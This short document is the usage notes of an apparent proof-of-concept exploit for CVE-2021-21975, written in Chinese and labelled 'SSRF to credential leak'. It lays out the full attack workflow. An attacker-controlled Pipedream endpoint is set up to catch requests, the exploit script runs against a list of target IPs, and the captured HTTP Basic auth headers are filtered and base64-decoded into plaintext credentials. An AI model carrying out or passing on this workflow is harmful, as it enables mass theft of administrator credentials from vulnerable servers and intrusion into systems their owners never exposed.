#SSRF-POC - SSRF 到凭据泄露
#首先配置 pd 客户端。
#现在运行 ./pd deploy http-new-requests
#现在替换脚本中的 pipedream http 请求示例:Randomstring.m.pipedream.net
#在一个单独的终端中运行 - ./pd logs new-requests | tee -a req.txt
#然后在另一个终端中运行 - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"这是一个早期的概念验证,在漏洞公开时(几个月前)创建的,使用风险自负。":V
#credit @wabaf3t @D0rkerDevil